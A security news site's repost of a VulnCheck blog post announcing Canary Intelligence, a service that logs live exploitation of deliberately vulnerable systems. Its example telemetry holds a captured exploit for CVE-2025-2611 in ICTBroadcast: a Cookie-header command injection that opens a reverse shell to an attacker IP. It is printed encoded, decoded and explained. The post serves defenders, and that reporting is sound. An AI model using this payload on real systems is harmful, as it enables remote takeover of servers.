Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Heap-based buffer overflow in cw_acd daemon

    April 8, 2026

    InfoSec News Nuggets 04/08/2026

    April 8, 2026

    Yearly Breach Reports Summary 2023

    April 8, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»News»Introducing VulnCheck Canary Intelligence | Blog
    News

    Introducing VulnCheck Canary Intelligence | Blog

    adminBy adminApril 5, 2026No Comments6 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    VulnCheck Canary Intelligence is a new offering that captures real-world exploitation as it happens. The dataset is built from a global network of intentionally vulnerable systems that we call canaries. Our canaries record live attacker activity including payloads, IP addresses, geolocation data, and exploited CVEs. This provides defenders with ground-truth visibility into what vulnerabilities are actively targeted in the wild. This isn’t theoretical, it’s verified exploitation telemetry from real attacks on real software.

    VulnCheck believes the most important vulnerabilities are those actively exploited in the wild. Acting on that belief, we built Suricata and Snort rules for Initial Access Intelligence to detect exploitation in network traffic. It’s also why we’ve invested so heavily in curating our freely available VulnCheck Known Exploited Vulnerability (KEV) database. However, the public reporting that KEV relies on can sometimes trail behind real-world exploitation. Canaries close that gap by applying our network detection rules across the internet. Attacks observed by Canaries can appear in the VulnCheck KEV within minutes of exploitation, giving defenders critical time to respond to the vulnerabilities that actually matter.

    VulnCheck canaries are a natural evolution of our product offering. Building on VulnCheck Initial Access Intelligence, which provides intentionally vulnerable Docker containers for customers to test exploits and detections, we’ve deployed these same systems across the Internet to observe how attackers interact with real software. Unlike a honeypot, which can be fingerprinted and intentionally evaded by threat actors, a canary always appears genuine, because it is.

    VulnCheck Canary Intelligence

    VulnCheck Canary Intelligence delivers detailed exploitation telemetry and makes it possible to infer associated Command & Control (C2) infrastructure. With this visibility, defenders can distinguish low-effort scans (e.g., Nuclei) from more advanced or targeted attacks. For example, VulnCheck was the first to report real exploitation of CVE-2025-2611, an unauthenticated remote code execution vulnerability in ICTBroadcast call center software. The data we provide to VulnCheck Canary Intelligence customers looks like this:

       {
          "src_ip": "159.65.227.190",
          "src_port": 38761,
          "src_country": "US",
          "dst_country": "US",
          "cve": "CVE-2025-2611",
          "signature_id": 12700629,
          "signature": "VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt",
          "category": "Web Application Attack",
          "severity": 1,
          "payload": "R0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV83KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMxLjAuMC4wIFNhZmFyaS81MzcuMzYNCkNvb2tpZTogQlJPQURDQVNUPWBlY2hvJHtJRlN9YzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRVNUxqWTFMakl5Tnk0eE9UQXZPVEE1TlNBd1BpWXh8YmFzZTY0JHtJRlN9LWR8c2hgDQoNCg==",
          "http": {
            "url": "/login.php",
            "http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
            "protocol": "HTTP/1.1"
          },
          "timestamp": "2025-11-01T12:03:20.969Z"
        },
    

    In this event, we identified that 159.65.227.190 (US) targeted a canary in the US via CVE-2025-2611. The payload field is base64-encoded to preserve special characters; when decoded, the request body shows the exploit delivered through the Cookie header:

    GET /login.php HTTP/1.1
    Host: VC_REDACTED
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
    Cookie: BROADCAST=`echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTU5LjY1LjIyNy4xOTAvOTA5NSAwPiYx|base64${IFS}-d|sh`
    

    Decoded and interpreted, the attacker base64-decodes a payload and pipes it to sh, yielding a reverse shell back to 159.65.227.190:9095.

    From a single record, Canary Intelligence customers can therefore:

    • Attribute activity to a source IP and country, and a targeted geography
    • Associate the IP with a specific CVE being exploited
    • Recover the raw payload and any embedded C2 addresses
    • Determine if the event was generated by a scanning tool like Nuclei or a true exploitation attempt

    We expose Canary telemetry in five indices by retention window: vulncheck-canaries-3d, vulncheck-canaries-10d, vulncheck-canaries-30d, vulncheck-canaries-90d, and vulncheck-canaries (the full, historical index). Customers can query these indices via API or download offline backups for enrichment, correlation, and threat-hunting workflows.

    VulnCheck Canary Intelligence seamlessly integrates across the existing VulnCheck product line, expanding context and precision across datasets.

    Canary exploitation data is now surfaced directly in the freely available VulnCheck Known Exploited Vulnerability (KEV). Each CVE entry includes links to relevant Canary observations, a new Boolean field reported_exploited_by_vulncheck_canaries. Here is an example using the KEV entry for CVE-2025-2611:

    {
          "vendorProject": "ICTBroadcast",
          "product": "ICTBroadcast",
          "shortDescription": "The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.\n\n\n\n\nVersions 7.4 and below are known to be vulnerable.",
          "vulnerabilityName": "  Improper Input Validation",
          "required_action": "Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",
          "knownRansomwareCampaignUse": "Unknown",
          "cve": [
            "CVE-2025-2611"
          ],
          "cwes": [],
          "vulncheck_xdb": [],
          "vulncheck_reported_exploitation": [
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12",
              "date_added": "2025-10-12T11:12:37.803Z"
            },
            {
              "url": "https://www.vulncheck.com/blog/ictbroadcast-kev",
              "date_added": "2025-10-14T00:00:00Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-15",
              "date_added": "2025-10-15T13:16:43.284Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-20",
              "date_added": "2025-10-20T05:38:50.634Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-21",
              "date_added": "2025-10-21T11:28:34.748Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-22",
              "date_added": "2025-10-22T03:31:40.775Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-23",
              "date_added": "2025-10-23T06:40:46.346Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-29",
              "date_added": "2025-10-29T10:01:15.64Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-11-01",
              "date_added": "2025-11-01T12:03:20.969Z"
            },
            {
              "url": "https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-11-03",
              "date_added": "2025-11-03T12:58:29.691Z"
            }
          ],
          "reported_exploited_by_vulncheck_canaries": true,
          "date_added": "2025-10-12T11:12:37.803Z",
          "_timestamp": "2025-11-03T13:27:52.697389321Z"
        }
      ]
    }
    

    Also an additional event has been added to the VulnCheck Console’s CVE timeline labeled “First Canary Exploitation.” This gives all community users visibility into real exploitation as soon as it’s observed.

    cve-2025-2611.png

    VulnCheck Exploit & Vulnerability Intelligence customers will now see Canary data integrated into vulncheck-nvd, vulncheck-nvd2, and exploits indices. Each exploit record includes Canary observation links and the new boolean field “reported_exploited_by_vulncheck_canaries”, allowing users to instantly filter and prioritize CVEs that have been verified through real exploitation.

    Canary data is also incorporated into VulnCheck IP Intelligence. IPs associated with exploitation observed by Canaries are included alongside the corresponding CVE, attacker country, and first-seen timestamp. For example:

    {
          "ip": "159.65.227.190",
          "port": 38761,
          "ssl": false,
          "lastSeen": "2025-11-01T12:03:20.969Z",
          "asn": "AS14061",
          "country": "United States",
          "country_code": "US",
          "city": "North Bergen",
          "cve": [
            "CVE-2025-2611"
          ],
          "matches": [
            "VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt"
          ],
          "hostnames": [],
          "type": {
            "id": "vulncheck-canaries",
            "kind": "",
            "finding": "Web Application Attack"
          },
          "feed_ids": [
            "1319334194617328"
          ],
          "_timestamp": "2025-11-01T12:03:20.969Z"
        },
    

    VulnCheck Canary Intelligence gives defenders something they desperately need: verified, real-time visibility into active exploitation across the internet. It transforms exploitation from something discovered after the fact into something defenders can monitor as it happens. By integrating Canary data across VulnCheck products, customers gain:

    • Immediate awareness of CVEs being exploited in the wild
    • Earlier detection and prioritization of vulnerabilities that actually matter
    • Attribution insight linking attacker IPs, infrastructure, and payloads
    • Contextual enrichment across VulnCheck KEV, Exploit & Vulnerability Intelligence, and IP Intelligence datasets

    Defenders can now act on ground-truth exploitation telemetry, not assumptions, not lab data, and not delayed reporting. VulnCheck Canary Intelligence turns live attacks into early warning.

    Get started: create an account to request a Canary Intelligence trial, access real-world exploit listings now via the free VulnCheck KEV, or explore ongoing Canary exploitation trends on our VulnCheck Research site.

    About VulnCheck

    VulnCheck is the exploit intelligence company helping enterprise, global government organizations and cybersecurity vendors respond to new vulnerabilities and emerging threats faster with more context. Trusted by the world’s largest organizations, VulnCheck protects hundreds of millions of systems and people worldwide, enabling them to outpace adversaries with threat intelligence solutions purpose-built for machine-level consumption and response actioning at scale. VulnCheck’s threat intelligence offerings equip teams with comprehensive, real-time exploit and vulnerability intelligence, first-party attack visibility and essential detections that are autonomously correlated and machine-readable, enabling emerging threat response in software vs human analysis. Follow the company on LinkedIn or X.



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleCVE-2026-5603 | THREATINT
    Next Article Debian Tor Package Denial of Service Issues Fixed in DSA-6200-1
    admin
    • Website

    Related Posts

    News

    InfoSec News Nuggets 04/08/2026

    April 8, 2026
    News

    Microsoft rolls out fix for broken Windows Start Menu search

    April 8, 2026
    News

    How Secure by Design Helps Developers Build Secure Software

    April 8, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views

    Catchy & Intriguing

    March 17, 202619 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202617 Views
    Our Picks

    Heap-based buffer overflow in cw_acd daemon

    April 8, 2026

    InfoSec News Nuggets 04/08/2026

    April 8, 2026

    Yearly Breach Reports Summary 2023

    April 8, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.